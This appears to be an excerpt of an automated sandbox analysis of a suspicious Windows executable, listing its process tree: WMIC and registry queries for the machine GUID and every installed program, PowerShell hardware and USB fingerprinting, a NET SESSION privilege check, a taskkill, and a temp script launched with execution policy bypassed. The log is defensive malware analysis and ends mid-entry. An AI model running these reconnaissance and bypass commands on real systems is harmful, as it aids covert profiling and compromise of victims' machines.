  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:5464
- - C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe
    "C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\desdoran" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1868 --field-trial-handle=1872,i,411262818171109507,13409611263580719183,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2024
- - C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe
    "C:\Users\Admin\AppData\Local\Programs\desdoran\efdzdfzedzed.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=fr --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\desdoran" --mojo-platform-channel-handle=2084 --field-trial-handle=1872,i,411262818171109507,13409611263580719183,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=5464 get ExecutablePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic process where processid=5464 get ExecutablePath
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4436
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "NET SESSION"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5732
  - - C:\Windows\system32\net.exe
      NET SESSION
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5396
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 SESSION
        5⤵
        
        PID:2036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4972
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
      4⤵
      PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance Win32_PhysicalMemory | Select-Object Capacity,Speed,Manufacturer,MemoryType,PartNumber,SerialNumber | ConvertTo-Json""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Get-CimInstance Win32_PhysicalMemory | Select-Object Capacity,Speed,Manufacturer,MemoryType,PartNumber,SerialNumber | ConvertTo-Json"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-Volume | Select-Object DriveLetter,FileSystemType,Size,SizeRemaining | ConvertTo-Json""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2232
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Get-Volume | Select-Object DriveLetter,FileSystemType,Size,SizeRemaining | ConvertTo-Json"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-PnpDevice -PresentOnly | Where-Object { $_.InstanceId -match '^USB' } | Select-Object InstanceId,Name,Manufacturer | ConvertTo-Json""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Get-PnpDevice -PresentOnly | Where-Object { $_.InstanceId -match '^USB' } | Select-Object InstanceId,Name,Manufacturer | ConvertTo-Json"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:60
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance Win32_VideoController | Select-Object CurrentHorizontalResolution,CurrentVerticalResolution,CurrentBitsPerPixel | ConvertTo-Json""
    3⤵
    PID:952
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Get-CimInstance Win32_VideoController | Select-Object CurrentHorizontalResolution,CurrentVerticalResolution,CurrentBitsPerPixel | ConvertTo-Json"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:1660
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:5960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
    3⤵
    PID:2972
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:5720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
    3⤵
    PID:5500
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
      4⤵
      PID:5664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
    3⤵
    PID:5320
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
      4⤵
      PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
    3⤵
    PID:5696
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
      4⤵
      PID:4792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
    3⤵
    PID:3424
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
      4⤵
      PID:892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
    3⤵
    PID:2252
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
      4⤵
      PID:5428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
    3⤵
    PID:4712
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
      4⤵
      PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
    3⤵
    PID:4332
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
      4⤵
      PID:5276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
    3⤵
    PID:5288
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
      4⤵
      PID:3692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
    3⤵
    PID:5240
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
      4⤵
      PID:5712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
    3⤵
    PID:3716
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
      4⤵
      PID:5900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
    3⤵
    PID:1724
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
      4⤵
      PID:8
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 135.0 (x64 en-US)""
    3⤵
    PID:2316
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 135.0 (x64 en-US)"
      4⤵
      PID:4360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
    3⤵
    PID:3868
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
      4⤵
      PID:6116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
    3⤵
    PID:4644
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
      4⤵
      PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mspaint-b330ad9e-f80b-4c96-9949-4b4228be9a6e""
    3⤵
    PID:1780
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mspaint-b330ad9e-f80b-4c96-9949-4b4228be9a6e"
      4⤵
      PID:2520
- - C:\Windows\system32\taskkill.exe
    taskkill /PID 1780 /F
    3⤵
    - Kills process with taskkill
    PID:3076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mstsc-4b0a31aa-df6a-4307-9b47-d5cc50009643""
    3⤵
    PID:5432
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mstsc-4b0a31aa-df6a-4307-9b47-d5cc50009643"
      4⤵
      PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
    3⤵
    PID:3124
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
      4⤵
      PID:3732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
    3⤵
    PID:5896
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
      4⤵
      PID:5476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SnippingTool-ee6eb196-db28-4d99-816d-fa9a63b4a377""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2484
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SnippingTool-ee6eb196-db28-4d99-816d-fa9a63b4a377"
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      PID:5956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
    3⤵
    PID:5616
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
      4⤵
      PID:5292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
    3⤵
    PID:752
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
      4⤵
      PID:2564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""
    3⤵
    PID:3212
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"
      4⤵
      PID:1012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""
    3⤵
    PID:4144
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"
      4⤵
      PID:3144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
    3⤵
    PID:4648
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
      4⤵
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""
    3⤵
    PID:5364
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"
      4⤵
      PID:2900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
    3⤵
    PID:3236
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
      4⤵
      PID:2072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""
    3⤵
    PID:1420
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"
      4⤵
      PID:564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
    3⤵
    PID:1428
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
      4⤵
      PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
    3⤵
    PID:5832
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
      4⤵
      PID:2960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
    3⤵
    PID:1240
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4968
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
      4⤵
      PID:3956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
    3⤵
    PID:3016
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
      4⤵
      PID:448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
    3⤵
    PID:4516
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
      4⤵
      PID:2036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""
    3⤵
    PID:5596
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"
      4⤵
      PID:5612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
    3⤵
    PID:1396
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
      4⤵
      PID:2640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""
    3⤵
    PID:4172
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"
      4⤵
      PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B3CC37E-0C10-4698-8297-73D8073E1AB8}""
    3⤵
    PID:1400
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B3CC37E-0C10-4698-8297-73D8073E1AB8}"
      4⤵
      PID:5156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
    3⤵
    PID:1876
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
      4⤵
      PID:4644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
    3⤵
    PID:2260
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
      4⤵
      PID:5728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
    3⤵
    PID:5836
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
      4⤵
      PID:1176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""
    3⤵
    PID:2724
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"
      4⤵
      PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""
    3⤵
    PID:4012
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"
      4⤵
      PID:3124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""
    3⤵
    PID:4604
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"
      4⤵
      PID:2848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
    3⤵
    PID:2328
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
      4⤵
      PID:4460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""
    3⤵
    PID:1300
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}"
      4⤵
      PID:5620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
    3⤵
    PID:3960
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
      4⤵
      PID:5764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}""
    3⤵
    PID:4680
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D46F1FD9-2FE8-4D05-B2AC-011C23B69B24}"
      4⤵
      PID:3324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}""
    3⤵
    PID:5652
  - - C:\Windows\system32\reg.exe
      C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E634F316-BEB6-4FB3-A612-F7102F576165}"
      4⤵
      PID:5508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\ReQYAIePmlS5_tezmp.ps1""
    3⤵
    PID:2664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
